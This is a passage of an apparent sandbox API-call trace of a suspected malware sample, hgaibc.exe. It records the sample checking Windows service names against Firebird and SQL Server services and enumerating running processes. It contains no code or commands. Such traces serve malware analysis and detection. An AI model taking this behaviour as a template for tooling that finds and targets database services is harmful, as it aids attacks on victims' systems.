lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0175.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0175.632] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0175.632] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0175.632] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0175.632] lstrlenW (lpString="NcbService") returned 10 [0175.632] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0175.632] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0175.633] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0175.633] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0175.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0175.633] lstrlenW (lpString="netprofm") returned 8 [0175.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0175.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0175.633] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0175.633] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0175.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0175.633] lstrlenW (lpString="NgcSvc") returned 6 [0175.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0175.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0175.633] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0175.633] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0175.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0175.633] lstrlenW (lpString="NlaSvc") returned 6 [0175.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0175.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0175.633] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0175.633] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0175.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0175.633] lstrlenW (lpString="nsi") returned 3 [0175.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0175.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0175.633] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0175.633] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0175.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0175.633] lstrlenW (lpString="PcaSvc") returned 6 [0175.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0175.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0175.634] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0175.634] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0175.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0175.634] lstrlenW (lpString="PlugPlay") returned 8 [0175.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0175.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0175.634] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0175.634] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0175.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0175.634] lstrlenW (lpString="Power") returned 5 [0175.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0175.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0175.634] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0175.634] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0175.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0175.634] lstrlenW (lpString="ProfSvc") returned 7 [0175.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0175.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0175.634] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0175.634] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0175.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0175.634] lstrlenW (lpString="RpcEptMapper") returned 12 [0175.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0175.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0175.634] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0175.634] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0175.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0175.635] lstrlenW (lpString="RpcSs") returned 5 [0175.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0175.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0175.635] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0175.635] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0175.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0175.635] lstrlenW (lpString="SamSs") returned 5 [0175.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0175.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0175.635] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0175.635] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0175.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0175.635] lstrlenW (lpString="Schedule") returned 8 [0175.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0175.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0175.635] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0175.635] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0175.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0175.635] lstrlenW (lpString="SecurityHealthService") returned 21 [0175.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0175.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0175.635] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0175.635] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0175.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0175.635] lstrlenW (lpString="SENS") returned 4 [0175.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0175.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0175.635] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0175.636] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0175.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0175.636] lstrlenW (lpString="ShellHWDetection") returned 16 [0175.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0175.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0175.636] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0175.636] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0175.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0175.636] lstrlenW (lpString="Spooler") returned 7 [0175.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0175.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0175.636] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0175.636] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0175.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0175.636] lstrlenW (lpString="StateRepository") returned 15 [0175.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0175.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0175.636] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0175.636] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0175.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0175.636] lstrlenW (lpString="SysMain") returned 7 [0175.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0175.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0175.636] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0175.636] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0175.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0175.636] lstrlenW (lpString="SystemEventsBroker") returned 18 [0175.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0175.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0175.636] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0175.637] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0175.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0175.637] lstrlenW (lpString="Themes") returned 6 [0175.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0175.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0175.637] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0175.637] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0175.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0175.637] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0175.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0175.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0175.637] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0175.637] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0175.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4601700 | out: hHeap=0x6a0000) returned 1 [0175.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x544 [0175.641] Process32FirstW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.716] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.716] lstrlenW (lpString="System") returned 6 [0175.717] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.717] lstrlenW (lpString="smss.exe") returned 8 [0175.717] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.718] lstrlenW (lpString="csrss.exe") returned 9 [0175.718] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.719] lstrlenW (lpString="wininit.exe") returned 11 [0175.719] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.720] lstrlenW (lpString="csrss.exe") returned 9 [0175.720] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.721] lstrlenW (lpString="winlogon.exe") returned 12 [0175.721] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.722] lstrlenW (lpString="services.exe") returned 12 [0175.722] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.723] lstrlenW (lpString="lsass.exe") returned 9 [0175.723] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0175.724] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0175.724] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0175.725] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0175.725] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.726] lstrlenW (lpString="svchost.exe") returned 11 [0175.726] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.727] lstrlenW (lpString="svchost.exe") returned 11 [0175.727] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.728] lstrlenW (lpString="dwm.exe") returned 7 [0175.728] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.729] lstrlenW (lpString="svchost.exe") returned 11 [0175.729] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.729] lstrlenW (lpString="svchost.exe") returned 11 [0175.729] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.730] lstrlenW (lpString="svchost.exe") returned 11 [0175.730] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.731] lstrlenW (lpString="svchost.exe") returned 11 [0175.731] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.732] lstrlenW (lpString="svchost.exe") returned 11 [0175.732] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.733] lstrlenW (lpString="svchost.exe") returned 11 [0175.733] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.734] lstrlenW (lpString="svchost.exe") returned 11 [0175.734] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.735] lstrlenW (lpString="svchost.exe") returned 11 [0175.735] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.736] lstrlenW (lpString="svchost.exe") returned 11 [0175.736] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.737] lstrlenW (lpString="svchost.exe") returned 11 [0175.737] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.738] lstrlenW (lpString="spoolsv.exe") returned 11 [0175.738] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.739] lstrlenW (lpString="svchost.exe") returned 11 [0175.739] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.739] lstrlenW (lpString="audiodg.exe") returned 11 [0175.740] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0175.740] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0175.740] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0175.741] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0175.741] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0175.742] lstrlenW (lpString="Memory Compression") returned 18 [0175.742] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0175.743] lstrlenW (lpString="sihost.exe") returned 10 [0175.743] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.744] lstrlenW (lpString="svchost.exe") returned 11 [0175.744] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0175.745] lstrlenW (lpString="msoia.exe") returned 9 [0175.745] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0175.746] lstrlenW (lpString="taskhostw.exe") returned 13 [0175.746] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.747] lstrlenW (lpString="explorer.exe") returned 12 [0175.747] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0175.748] lstrlenW (lpString="SearchUI.exe") returned 12 [0175.748] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0175.749] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0175.749] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0175.749] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0175.749] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.750] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0175.750] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0175.758] lstrlenW (lpString="hgaibc.exe") returned 10 [0175.758] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0175.759] lstrlenW (lpString="cmd.exe") returned 7 [0175.759] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0175.760] lstrlenW (lpString="conhost.exe") returned 11 [0175.760] Process32NextW (in: hSnapshot=0x544, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, 